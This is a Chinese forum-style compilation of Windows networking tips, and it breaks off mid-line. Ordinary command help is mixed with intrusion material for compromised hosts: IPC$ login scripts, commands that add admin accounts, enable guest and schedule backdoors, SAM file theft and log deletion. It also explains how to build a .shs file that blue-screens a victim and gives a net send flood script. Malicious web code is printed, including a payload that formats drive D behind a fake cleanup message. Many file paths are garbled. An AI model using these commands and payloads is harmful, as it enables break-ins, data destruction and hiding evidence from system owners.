網路基礎知識大全
07-03
1)如何查看本機所開埠:用netstat -a —n命令查看!再stat下面有一些英文,我來簡單說一下這些英文具體都代表什麼LISTEN:偵聽來自遠方的TCP埠的連接請求SYN-SENT:再發送連接請求後等待匹配的連接請求SYN-RECEIVED:再收到和發送一個連接請求後等待對方對連接請求的確認ESTABLISHED:代表一個打開的連接FIN-WAIT-1:等待遠程TCP連接中斷請求,或先前的連接中斷請求的確認FIN-WAIT-2:從遠程TCP等待連接中斷請求CLOSE-WAIT:等待從本地用戶發來的連接中斷請求CLOSING:等待遠程TCP對連接中斷的確認LAST-ACK:等待原來的發向遠程TCP的連接中斷請求的確認TIME-WAIT:等待足夠的時間以確保遠程TCP接收到連接中斷請求的確認CLOSED:沒有任何連接狀態2)如何獲得一個IP地址的主機名?利用ping -a ip 命令查看!再第一行的pinging後面的 『ip』前面的英文就是對方主機名!同樣道理,利用ping machine_name也可以得到對方的ip獲得一個網站的ip地址的方法是:ping www.***.com比如想知道sohu的ip,就用ping http://www.sohu.com/來查看就可以了順便說一句:如果返回:Reply from *.*.*.*: TTL expired in transit的話,呵呵,代表TTL(生命周期)在傳輸過程中過期什麼意思呢?我來解釋一下!導致這個問題出現的原因有兩個:1)TTL值太小!TTL值小於你和對方主機之間經過的路由器數目。 2)路由器數量太多,經過路由器的數量大於TTL值!呵呵,其實這兩點是一個意思!只不過說法不同而已!3)如何查看本機的ip地址?用ipconfig來查看就可以!也可以再Windows中的開始菜單,運行中輸入winipcfg,同樣可以看到自己的ipipconfig命令後面如果加一個參數 /all的話,可以得到更加詳細的資料,比如DNS、網關等……4)再使用net命令的時候遇到一些錯誤代碼,如何查看對應的錯誤信息?用命令 net helpmsg erorr_code來查看就可以了比如錯誤代碼為:88則查看命令為:net helpmsg 88 下面有這個錯誤代碼的中文顯示!5)利用telnet連接到對方主機上,想獲得一些系統信息,用什麼命令?set命令可以很好的完成你所需要收集信息的任務的!方法:再cmd下直接輸入set(telnet對方主機以後,也是直接set就可以了~然後能夠得到NNNNN多的信息)再這裡,computername:呵呵,還用說么?主機名!OS=Windows_NT :操作系統的類型哦~path=C:perlin :(perl的解釋器位置!)systemDrive=c: 操作系統盤符!USERNAME=coldcrysky 當前登陸使用機器的用戶……(6)跟蹤路由器的命令是什麼?tracert 格式:tracert ip中間會列出所有經過的路由器列表!這些路由器如果是暴露再防火牆外面的話,還可以看到路由的IP哦~呵呵(這裡又涉及到了另外一個問題:為什麼要把路由放在防火牆後面?原因呢,主要有兩點:1)保護路由器!因為現在越來越多的攻擊和入侵已經開始瞄準路由器了~如果直接把路由暴露在外面,呵呵,是非常危險的!被DoS了就不好了啊~呵呵,所以要放在防火牆裡面;2)為路由器減少負擔!如果所有的過濾功能統統都壓在路由器上面,呵呵,路由器的負擔就太大了!)當然,利用pathping也可以達到同樣效果!格式與tracert一樣!7)簡單介紹一下cookie!cookie,又名小甜點。它的作用:記錄訪問者的一些信息。例如利用cookie記錄你所登陸這個網頁的次數、登陸時曾經輸入的信息……最常見的是,大家再登陸論壇(郵箱)的時候,經常在輸入第一個字母的時候,往往下面就顯示出了所有在本機登陸過該論壇(郵箱)的用戶名吧?呵呵,這個就是cookie的作用!大家在Administrator的cookies目錄中可以看到很多的記事本文檔吧?這些都是cookie,雖然經過了加密,但是仔細查找的話,仍然能夠看到一些敏感信息!況且現在也已經有了專門查看cookie的軟體!利用這些軟體,你的隱私將不保哦~那麼,如何清除cookie呢?一般情況下,可以在Internet選項中的常規選項卡中看到一個刪除cookies的按鈕,點擊就可以清楚掉了~除此以外,還要在internet選項中的內容選項卡中找到自動完成按鈕,把裡面的四項都選中!然後點擊清除表單,清除密碼~然後到操作系統目錄所在的分區中!進入Winnt(98為windows)目錄(當然了,這些都是默認的目錄!如果你安裝的時候改名了,就對應的去相應目錄)之後找到Temporary Internet Files目錄(2000的目錄在c:Documents and settingsadministratorLocal settingsTemporary Internet Files)98直接到windows目錄下找Temporary Internet Files就可以了~,找到這個文件夾後,打開!看到裡面有NNNNNNNNNNNN多的文件了么?呵呵,這些是你瀏覽過的網頁的記錄(有的時候從網站上面看到漂亮的FLASH,可是不能保存怎麼辦?只要在線瀏覽一遍以後,斷線到這裡來找*.swf,之後依次打開查看的話,相信你會找到你所需要的FLASH的!),好了,跑題了~繼續說:這些文件是網站的頁面記錄,直接刪除就可以了!另外,有沒有徹底禁止cookie的方法呢?呵呵,當然有了!在IE的Internet選項中,找到隱私選項卡!,把裡面的滑塊拖到最上面,邊上寫著:阻止所有cookie,呵呵,是不是?另外一種方法:找到Windows目錄下的cookies目錄!把裡面的txt文件全部刪除!,最後應該只剩下一個index.dat文件!之後把這個文件夾設置成只讀就可以了~不過,禁止cookie後,大部分的論壇都無法正常登陸了啊!呵呵,到底禁止不禁止就看你自己的了~8)安裝2000的時候,速度會特別特別特別慢,怎麼加快安裝速度呢?在DOS上面安裝,應該用98啟動光碟來引導系統!然後按照下面的方法來做,可以提高安裝速度:g:>cd windows -------假設G為光碟機 windows為98的安裝目錄!g:windows>smartdrv -------載入smartdrv程序!載入後沒有任何提示信息!只要不返回錯誤信息就是載入成功了~這時候安裝2K的話,速度會很快的哦~9)Windows2K密碼忘記了,如何才能進入系統?Windows2K的用戶配置信息和密碼保存在SAM文件里!該文件位於:c:winntsystem32config目錄中!只要刪除這個文件就可以了~另外,在c:winnt
epair目錄中也同樣有一個SAM文件(這個是前者的備份!)如果你在登陸肉雞的時候,copy前面那個目錄中的SAM文件,你會發現COPY不下來!呵呵,為什麼?因為運行著的2K系統會保護SAM文件啊~這個時候你就COPY這個就可以了!10)ping不到,tracert不到,但是卻能用nbtstat顯示對方的一些信息,為什麼?因為tracert和ping命令使用的是ICMP協議!而nbtstat是通過對方的netbios埠來獲得對方的主機信息的!使用的是UDP和TCP協議!如果對方僅僅只對ICMP協議做了禁止的話,那通過這個命令獲得系統信息是正常的!11)telnet上去後,如何給對方開共享?開共享的命令如下:net share c=c:winntsystem 返回共享成功之後直接利用\ipc來訪問對方的system目錄了~刪除共享用share c /del 命令就可以了12)如何判斷對方的具體操作系統版本?首先用ver命令查看對方的版本號!如果是5.00.2195的話,為2K;5.1.2600為XP從這裡可以區分出來到底是2K還是XP了~下面進行更加具體的區分!2K的pro和svr版本區分:在telnet下,net shart查看啟動的服務~如果對方開啟了Terminal Services服務的話,基本上可以判斷為svr以上的版本了~如果沒有開啟,則為pro!(具體方法有三種,因為前幾天在論壇中我回復過暗界了~所以這裡就不再重複了~)XP的pro和home版的區分:home edition是無法安裝iis的!所以,可以通過iis服務來判斷到底是home版或者是pro了~當然了,如果對方是pro,但是將iis刪除(停用)的話,就沒辦法判斷了~呵呵13)如何查看98的隨機啟動的程序?在98下有一個實用配置程序(msconfig),中文名為:系統配置實用程序,調用的方法是在:開始--運行中輸入msconfig,在裡面,有一個啟動的選項卡,點擊後,可以看到很多隨即啟動程序,如果前面帶有鉤的話,就是啟動時隨機啟動的,取消的話就是把前面的小鉤去掉就可以了~(如果在這裡查看到了一些未知的啟動文件--比如沒有文件的具體路徑,或者沒有文件名的話,最好取消它的自啟動!因為很有可能是木馬!)除了這裡以外,還有config.sys、autoexec.bat、system.ini、win.ini幾個選項卡,他們分別對應這幾個文件!只不過在這裡更方便查看而已!14)設置了BIOS密碼,可是卻忘記了,該怎麼辦?如果是可以進入Windows的話,可以找找biospwds和cmospwd這兩個軟體看看~還有利用DEBUG法:簡單介紹兩種:1)-o 70 16-o 71 13-q2)-o 70 16-o 71 16-q另一種方法:copy法:copy con cmos.com輸入下面10個字元:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然後按下F6並回車,退出,運行這個cmos.com程序就可以了~恩,如果不能進入Windows怎麼辦呢?簡單介紹兩種方法:1)用通用密碼:Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.這是常見的密碼,不妨試試~如果不行的話,可以利用CMOS放電:就是把主板上的電池取下來,等一會兒再插上去~15)如何自製一個讓98藍屏的炸彈?恩,這個是前幾天QQ上面朋友問我的問題,整理的時候突然間想起來了,就寫一下好了~首先,打開Word,再插入菜單中選擇對象,這時,彈出對象包裝程序窗口,再這個窗口中,點擊導入,隨便找一個文本或者程序就可以!之後點:編輯菜單。這裡選擇命令行,出現一個命令行窗口,在裡面協商c:concon,點擊保存,完成後,再點編輯包中的複製包,把他隨便到一個地方複製下來,之後看到的是一個名位片斷的東西!給這個文件起一個名字,呵呵,傳給那個可憐的傢伙吧,等待他藍屏,掉線!(這個命令行中可以插入很多的命令,不見得非要用這個98藍屏漏洞哦~)順便說一下:這個已經不是什麼新鮮的技術了,這個技術的名字叫做:碎片對象。呵呵,碎片?記憶碎片么?不是的!他的後綴是:.shs!之所以說一下這個,是因為有的朋友還不知道~做一個整理而已!不知道的朋友看過後就知道了,知道的朋友就權當複習了~另外,不要利用這個方法做破壞!否則後果自負!16)如何再命令行下殺死對方進程?利用微軟的2K以上操作系統都是含有這個工具的!該工具包含在2K光碟的support ools文件夾下!裡面有安裝程序,點擊後,就安裝了2K的support tools工具包,裡面有kill這個工具,這時候再cmd下可以輸入kill/?,就可以看到幫助了,使用這個命令的格式是:kill pid (pid是進程的ID號!)再任務管理器中可以看到進程的ID號!(不知道有幾位朋友用過藍色火焰?呵呵,用法跟這個一摸一樣!還有很多類似的木馬、後門軟體都有類似的功能!這個是windows自帶的大木馬『後門工具』而已!)這時候,有朋友問了,那再命令行下如何查看進程呢?呵呵,這就用到了系統自帶的有一個後門工具了:再剛才說得那個目錄中,還有一個工具叫tlist 看名字就能看出來是幹什麼的吧?用法更簡單!直接輸入tlist就可以得到pid遇隊形程序的列表了~那對方機器如果沒有安裝這兩個程序怎麼辦呢?沒關係,你把你操作系統盤符下面programfilessupport tools目錄下面的這兩個對應的exe文件上傳到對方的winntsystem32目錄中就可以了!呵呵~17)上次說了ping的基本用法,這次談談ping的命令參數!這個是本次問題集的重點部分!無論是小鳥還是老鳥,你們能保證你真的對這些參數了如指掌么?恐怕都未必!還是好好看看吧!這是TCP/IP協議中最有用的命令之一 它給另一個系統發送一系列的數據包,該系統本身又發回一個響應,這條實用程序對查找遠程主機很有用,它返回的結果表示是否能到達主機,宿主機發送一個返回數據包需要多長時間。 Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until interrupted.(除非人為中止,否則一直ping下去) -a Resolve addresses to hostnames.(把IP轉為主機名) -n count Number of echo requests to send.(響應請求的數量) -l size Send buffer size.(封包的大小) -f Set Don`t Fragment flag in packet.(信息包中無碎片) -i TTL Time To Live.(時間) -v TOS Type Of Service.(服務類型) -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.(較嚴格的……唉,怎麼譯好……算了,放著吧) -w timeout Timeout in milliseconds to wait for each reply.(timeout的時間) 比如大家可能都知道的一個命令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死霉國佬時所用的命令(當然這樣只會造成我方自己的網路阻塞)。 其實這個命令主要是用來看對方應答的速度,如果怎麼ping 得到的結果都是request time out。那恐怕你根本就不用你去找這台主機了,它不在你的射程之內。 18)如何查看本機的DNS伺服器?ipconfig其實是可以的(呵呵,上次就介紹過這個命令),除此以外,還可以利用一個命令:再cmd下輸入netsh,進入到netsh>提示符,再輸入:int ip 進入到interface ip> 然後再次輸入dump,這時候屏幕上出現當前連接的配置情況了這裡必須介紹一下netsh到底是作什麼用的!這個命令比較複雜,他包含了很多的子命令,所以這裡只對部分命令進行講解:1)查看本機IP:首先鍵入netsh,再netsh>提示符下輸入:interface 回車 之後:ip 回車 再之後:show address 回車 這樣,就可以看到當前連接的IP地址和子網掩碼。(其實這個命令不如ipconfig簡單,也不如ipconfig/all全面)2)修改網路配置:接著上面的命令,我們使用:set address name=「本地連接」 source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了當前的IP地址,用show address來看看(或者用ipconfig)3)顯示一個完整的網路配置教本:剛才說過,第一個命令顯示的信息不如ipconfig/all全面,不用著急,netsh再列印顯示網路配置上,還是有自己的特色的!例如:再interface ip>狀態下輸入:dump,會顯示一個清單,顯示所有本地連接(不管你是否使用~)與netstat -an不完全一樣!這就是netsh的簡單介紹和最基礎的用法!希望大家能夠掌握!還可以輸入?來查看幫助!(要在netsh>提示符下才能查看幫助啊~)19)肉雞上的部分文件無法刪除,怎麼辦?如果對方的文件夾是只讀的話,會出現拒絕訪問的字樣!這時候,我們可以再del命令後面加上/f參數來刪除!20)再說一個可以限制用戶登陸時間的命令!再net命令中就可以實現這樣的功能!具體方法如下:假如我們打算讓:coldcrysky這個用戶再周日到周易的上午八點到下午四點之間可以登陸,用這個命令:net user coldcrysky /timesunday-monday,08:00-16:00之後利用net user coldcrysky命令來查看登陸時間的限制,可以看到是我們所規定的時間(因為是中文的,很容易懂,我就不多廢話了)在此,特別提醒各位:命令中:星期日才是一周的開始!!!不要當成星期一!光說了怎麼設置,如果想恢復回去怎麼辦呢?(就是恢復成默認狀態,任何時間都可以登陸的狀態)看我的:net user coldcrysky /time:all --這樣就可以了~22)如何刪除windows2K的默認貢獻?首先打開記事本,輸入如下內容:net share c$ /deletenet share d$ /deletenet share e$ /deletenet share f$ /deletenet share g$ /deletenet share ipc$ /deletenet share admin$ /delete這裡的c$、d$、e$……是代表默認共享的盤符~又幾個就設置幾個就可以了~之後點擊保存成批處理文件(後綴為:bat的文件!)!加入到啟動組中就可以了~23)139埠的又一用法呵呵,寫這個帖子的原因是因為我答應給一個朋友回復139埠的作用來著……先聲明兩點:1)不要利用本帖所提到的方法去搞惡意破壞!2)呵呵,可能許多人已經知道了139埠這個用法了~本文只想起到一個拋磚引玉的作用!廢話不多說了~開始:如果你使用NT主機的話,那你可要注意了!重啟NT主機的方法如下:1:Net use \XXX.XXX.XXX.XXXipc$ "password" /user:"username"建立一個IPC連接2:net use H: \XXX.XXX.XXX.XXXC$將對方的C盤映射為自己的h盤3:copy c on h:
eboot.batIisreset /rebootCTRL+Z在對方的C盤上生成一個能重啟機器的文件4:net time \XXX.XXX.XXX.XXX得到對方機器時間5:at \XXX.XXX.XXX.XXX 重啟的時間 c:
eboot.bat設定對方重啟的時間!6:at \XXX.XXX.XXX.XXX查看任務上面是否添加了這個任務7:等對方重啟好了~上面的第三步是only for Win2K的,如果是Nt,就需要用意個指定的重啟程序,我們可以自己編寫一個reboot.exe來代替reboot.bat,代碼如下:#include "stdio.h"#include "windows.h"int main(){文件://定義重啟的時候發送給所有用戶的消息LPSTR msg="Reboot Tool By LionHook
http://www.xici.net";;文件://嘗試用最簡單的API函數重啟if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;文件://因為上面的重啟不成功,所以需要調整本進程的特權HANDLE hToken;TOKEN_PRIVILEGES tkp;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;文件://獲取重啟的特權 SE_SHUTDOWN_NAMELookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount=1;tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);文件://判斷是NT內核還是9X內核,選擇用不同的方式if(!GetVersion()& 0x80000000))InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);else if (!ExitWindowXXX(EWX_REBOOT,0))if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))return FALSE;return TRUE;對了,再次說明啊,別用本文提到的方法搞破壞,小心警察叔叔打PP~呵呵24)利用批處理文件來建立一個記錄3389登陸者信息的記錄器由於Terminal Service默認是沒有日誌記錄的,只能依靠他的系統日誌,但是系統日誌只能記錄一些大動作(開啟或停止服務),那麼,如何用批處理文件來編寫一個將是3389埠的程序呢?很簡單:建立一個批處理文件:內容如下:@echo offdate/t >> c:3389log.txt:TS3389time/t >> c:3389log.txtnetstat -an | find "3389" |find "ESTABLISHED" >>c:3389log.txtgoto :TS3389之後保存!如果有人用你的3389登陸你的機器,呵呵,在c盤下就有3389log.txt這個文件!記錄了當天日誌,還有連接時間……資料~開始反擊~呵呵25)網路命令小節A、NET命令:IPC連接:格式 net use \對方IPipc$ "密碼" user:"用戶名" 『建立IPC連接~』net use \對方IPipc$ /delete 『斷開連接~』以下操作需要在連接到對方主機後才可進行!!!net user coldcrysky xyz /add 『在連接的目標主機中加入一個用戶名為COLDCRYSKY 密碼為WYZ的用戶』net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著許可權的提高啊!!!^_^』net use z:\對方IPC$ 『把對方的C盤映射為本機的Z盤-可依照需要更改映射盤符!』net start telnet 『開啟TELNET』net user guest /active:yes 『激活GUEST』net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』B、AT命令:查看遠程機時間:net time \對方IP加入一項新任務:at \對方IP 時間 文件名 『用來把自己上傳的後門程序在制定時間運行,方便以後進入肉雞!』C、TELNET命令:telnet 對方IP 埠 『作用不用我說了吧???』D、FTP命令:登陸:ftp 對方網址(IP地址)上傳文件:get 文件在本機完整路徑 對方文件存放完整路徑下載文件:put 對方文件完整路徑 本機存放文件路徑E、COPY命令:在建立連接後(尤其是IPC$連接後,很有用的命令哦~)⑴copy index.htm \127.0.0.1c$index.htm『將本機index.htm文件複製到127.0.0.1的C盤下,如果要放到對方的NT目錄下,則把C改為admin$』⑵copy \127.0.0.1admin
epairsam_ c: 『將遠程機資料庫文件拷貝到本機C盤根目錄下』F、SET命令:主要用於分析目標計算機的基本信息用!具體使用方法請查找相關文件!G、NBTSTAT命令:nbtstat -A 對方IP (這個A大寫)『在其中顯示<037>前面的英文或數字就是計算機名稱!當然,也可以利用PING -A 對方ip的方法來查看對方主機名!效果相同!!!』H、SHUTDOWN命令:『用來關閉對方NT服務的命令』格式如下:shutdown \IP地址 t:20『20秒後自動關閉對方NT服務!由於對對方機器影響較大,慎用!!!』I、DIR命令:還用我說么?大家是不是早就該掌握了???(不知道的還是查閱相關資料吧~~~)J、ECHO命令:echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有內容』echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』K、ATTRIB命令:更改文件屬性用,格式:Attrib -r index.htm 『去掉只讀屬性』(+- 分別代表增加和減少)L、DEL命令:『刪除日誌的時候用!』del c:winntsystem32logfiles*.*del c:winntsystem32config*.evtdel c:winntsystem32dtclog*.*del c:winntsystem32*.logdel c:winntsystem32*.txtdel c:winnt*.txtdel c:winnt*.logM、PING命令:-t :ping制定IP,知道網路斷開或按CTRL+C結束!-a :解釋PING IP的主機名-n count :發送count指定的ECHO數據包,默認為4個!26)這裡我必須(或者說不得不重新重申一個命令!不過說之前我要把這個命令的相關命令稍微介紹一下!)我要說的命令就是:開啟服務和停止服務的net start and net stop這兩個命令大多數朋友已經很熟悉了吧?不過為了方便更多的菜鳥能看明白我要說的意思,不用再看其他相關文章,所以我簡單說兩句:net start是開啟服務!那麼,如何開啟呢?比如,我們這裡要開啟telnet服務,那就直接再2K的cmd下輸入:net start telnet就OK了~關閉一項服務的話,把start換成stop就OK了~不過這裡必須要注意:你所關閉的服務必須是已經開啟的服務!!!好像是一句廢話OK,有了這個前提後,下面就繼續介紹:那麼,net start和net stop到底能開啟什麼服務?其實這點也不需要你強記,記住這個命令就可以了:net help start和net help stop,這兩個會顯示出你所能開啟的服務有那些~~這裡比如我們查到了這個服務「CLIENT SERVICE FOR NETWARE」,那麼當這個命令使用net start和net stop的時候,你必須在這項服務上面加上「」,原因是因為這個服務名稱中帶有空格!如果服務名稱中不帶空格,你可以不用帶這個引號!!!這點是我強調的問題!大家一定不要忘記了!『前些天看到S8S8.net的黑白新區中有人說net start 和 net stop後面的服務名必須帶空格是錯誤的!明白原因了吧?』27)關於雙系統的兩個問題:A、如何在雙系統(98、2000)中安全刪除2K?先製作一張Windows 98 的啟動軟盤,再用它啟動你的計算機,運行sys命令恢復Windows 98引導記錄後,再運行fdisk/mbr恢復主引導記錄,完成後進入Windows 98,把winnt 和system volumn information 目錄刪除,再刪掉C盤上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。B、 Windows 98/XP雙系統啟動菜單修復1.修復前,在BIOS中設置從光碟機啟動。用Windows XP安裝盤啟動電腦,在載入必要的驅動後,出現Windows XP的安裝界面。有三個選項:(1)要現在開始安裝Windows XP,請按「Enter」鍵。(2)要用「恢復控制台」修復Windows XP安裝,按「R」鍵。(3)要退出安裝程序,不安裝Windows XP,按「F3」鍵;2. 按「R」鍵,進入「Microsoft Windows XP (TM) 故障恢復控制台」界面;故障恢復控制台提供系統修復和故障恢復功能。系統這時會搜尋已安裝的Windows XP系統文件,然後顯示搜尋結果,並詢問「要登錄到哪個Windows XP安裝(要取消,請按Enter)」,選擇1. D:Windows,回車,系統會再詢問「管理員密碼」,再鍵入安裝Windows XP時設置的管理員密碼,回車,出現D:Windows〉,這時需要輸入修復命令Fixboot,後面的參數為啟動扇區要寫入的磁碟盤符,這裡填入C:,回車。修復完成,鍵入Exit退出。重啟後就會看到久違的雙重啟動菜單了。並且,這樣修復後基本不產生垃圾文件。因為這兩個問題是非常非常普遍的,所以我就收集到這裡了~28)這裡說幾個主頁惡意代碼:『並不是讓大家把這些代碼加入到自己的主頁中!只是希望大家能了解惡意代碼,起到更好的防護作用!』A、死循環代碼:『把下列代碼加入到網頁中,可達到如上效果』<img src=javascript:location=「網頁的文件名.htm:」>說明:當含有這段代碼的網頁被人點擊,連接就會不斷的打開IE瀏覽器,直到你的系統資源浪費到0%~只有重新啟動才能正常使用!預防方法:禁用所有的ActiveX控制項和插件!因為這是一個ActiveX教本程序~B、恐怖的大圖片:『把下列代碼加入到網頁中,可達到如上效果』<img src= "http://恐怖圖片的連接地址" width_= "1" height= "100000000000000000000000">說明:當打開這樣的網頁,IE會不斷的解釋試圖打開,但由於圖片實在太大,超出了其處理能力,所以……C、地震死機代碼:『把下列代碼加入到網頁中,可達到如上效果』<script>if (window.top.moveBy){for (i = 1;i < 50; i++){for (j = 3;j > 0; j--){window.top.moveBy(0,i);window.top.moveBy(i,0);window.top.moveBy(0,-i*2);window.top.moveBy(-i*2,0);window.top.moveBy(0,i);window.top.moveBy(i,0);}}}</script><img src="c:concon">說明:<img src="c:concon">是windows9x的設備名稱解析漏洞!WINDOWS9x的concon設備名稱解析漏洞允許用戶進行攻擊,倒是98死機。原理:我們知道,CON是DOS下的特殊設備名,不允許做文件名,如果我們在DOS下鍵入如下命令:copy coldcrysky.txt con,系統會顯示coldcrysky.txt的內容,如果換成:copy coldcrysky.txt>con系統會提示文件不能拷貝到文件自身。如果吧con換成LPT或PRN,則輸出coldcrysky.txt到印表機。由此可見,CON代表文件本身,如果使用CONCON命令,則意味著系統不斷調用文件本身,視系統資源迅速枯竭,連按CTRL+ALT+DEL的機會都沒有~解決辦法:對於9X系統,強烈建議打補丁!!!2000和XP則不會死機~D、格式化硬碟:(最恐怖的~~~慎用!!!請勿用於非法用途!!!使用後如果有任何負作用,後果自負!與傷寒天空『ColdCrySky』;亂刀留影無關!!!)scr,Reset();scr.Path="C:\WINDOWS\StartMenu\Programs\啟動\startup.htm";scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"WSH.rUN(`start/m format.com d:/q/autotest/u`);alert(`IMPORTANT : Windows is removing unused temporary files.`);scr.write();說明:當您瀏覽了網頁,會把startup.hta文件寫入啟動文件夾,並提示WINDOWS正在刪除臨時文件!實際上是在格式化你的D盤,代碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對應為:Windows Scripting Host Shell Object。代碼中的:WSH全稱是:Windows Scripting Host,是微軟的一種基於32位系統平台與語言無關的教本解釋機制,它使得腳本能在WINDOWS桌面或命令提示符下運行~WSH所對應的程序WScript.exe是一個腳本語言解釋器,位於WINDOWS所在文件夾下,所以它可以像執行批處理文件一樣執行WSH腳本程序~解決方法:1)更新您的瀏覽器,使用最新的瀏覽器上網!2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用啟動菜單。3)吧format.com改名4)禁用WSH。具體方法:在win98中,從添加刪除程序中點擊WINDOWS安裝程序,打開附件一項,將WINDOWS SCRIPTING HOST前面的選項去掉,就可以卸載掉WSH了~~~win2000和xp的用戶可以在我的電腦-工具菜單-文件夾選項-選擇文件類型,找到VBS VBSCRIPT FILE選項,點擊刪除!29)系統自帶的系統工具其實無論大家從什麼地方,什麼方法找到一些好用的工具,都不如Windows自帶的工具用著方便(假設你區的地方正好不能上網,而你又沒有準備好這些工具,那怎麼辦?呵呵,不用著急,用好下面幾個Windows自帶的小工具,可以使你事半功倍!)1、msinfo32.exe位於C:Program FilesCommon FilesMicrosoft SharedMsinfomsinfo32.exe,顯示計算機中的有關係統信息,可用其診斷、解決計算機問題並查看遠程系統所生成的系統報告。2、drwatson.exe --這個工具給我特別的親密感覺:第一次使用這個工具是在看了LK007大哥給cool兄弟的回復以後,我馬上試驗~果然很有意思!LK007不愧是大哥!現在想起來都佩服不已~~~位於C: Windows drwatson.exe,當某個應用程序在運行過程中出錯時,它就會將出錯的程序以及出錯的內存地址一一記錄下來,並保存為Windows的Drwatson子目錄下的*.wlg記錄文件。3、sfc.exe位於C:WindowsSystemsfc.exe,用於自動搜索被改變、刪除或損壞了的系統文件。4、msconfig.exe位於C:WindowsSystemmsconfig.exe,通過修改啟動方式以及啟動時運行哪些應用程序等系統配置,從而達到快速排除故障的目的。5、scanreg.exe位於C:windowscommandscanreg.exe(DOS版本)及C:windowsscanregw.exe(Windows版本),用於檢查、修復、備份以及還原系統註冊表及相關配置文件的工具軟體,防止因註冊表數據被破壞而導致的系統故障。6、vcmui.exe位於C:Windowsvcmui.exe,在後台自動將被覆蓋的驅動程序備份下來,當我們安裝的新驅動出錯時可用它進行恢復。7、winrep.exe位於C:Windowswinrep.exe,能自動收集有關係統信息並提示用戶輸入故障所在,幫我們編寫一篇完整的「求援」報告,並將其發送給有關技術維護人員,簡化「求援」操作。這七個Windows自帶的小程序可以在開始菜單--運行中直接輸入文件名(無需輸入擴展名)調出該程序!31)批處理在入侵中的幾則妙用!A、簡化IPC$登陸肉雞的操作:用記事本建立一個名字為:ipcruqin.bat的批處理文件,內容如下:@net use \%1ipc$ %3 /u:"%2"@echo OK!已經成功建立連接之後,大家在CMD下輸入:ipcruqin.bat 肉雞IP 肉雞的admin帳號/用戶的密碼。就可以登陸上去了,而不需要那一大長串的命令了!B、批處理轟炸對方電腦:打開一記事本,在裡面輸入如下內容:@echo 正在轟炸中……tart@net send %1 %2@if errorlevel 1 goto overgoto startver@echo 發送失敗將其保存為bat格式的文件即可,使用方法:*.bat(該批處理文件的名字)+ 空格 + 目標IP + 空格 + 你要對他說得話!這次先簡單介紹這三個!等下次有機會再給大家介紹更多的批處理文件的用途!32)再說幾個非常簡單實用的DOS命令(工具):A、fport.exe --查看那些埠都是那些程序使用的命令。B、netstat -an --查看那些埠於外部的IP連接。比如這裡顯示 :23 XX.XX.XX.XX 而你又沒有開23埠,那麼,呵呵……還用我說么?C、letmain.exe \ip -admin -d --列出本機的administrators組的用戶名查看是否有異常。D、pslist.exe --列出進程E、pskill.exe --殺掉進程,有時候再任務管理器中無法終止程序,那就用這個工具來停止進程。F、login.exe --列出當前有那些用戶登陸再你的機器上。ping命令詳解ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list Options: -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 不停的ping地方主機,直到你按下Control-C。 此功能沒有什麼特別的技巧,不過可以配合其他參數使用,將在下面提到。 -a Resolve addresses to hostnames. 解析計算機NetBios名。 示例:C:\>ping -a 192.168.1.21 Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Ping statistics for 192.168.1.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms 從上面就可以知道IP為192.168.1.21的計算機NetBios名為iceblood.yofor.com。 -n count Number of echo requests to send. 發送count指定的Echo數據包數。 在默認情況下,一般都只發送四個數據包,通過這個命令可以自己定義發送的個數,對衡量網路速度很有幫助,比如我想測試發送50個數據包的返回的平均時間為多少,最快時間為多少,最慢時間為多少就可以通過以下獲知: C:\>ping -n 50 202.103.96.68 Pinging 202.103.96.68 with 32 bytes of data: Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Request timed out. ……………… Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Ping statistics for 202.103.96.68: Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: Minimum = 40ms, Maximum = 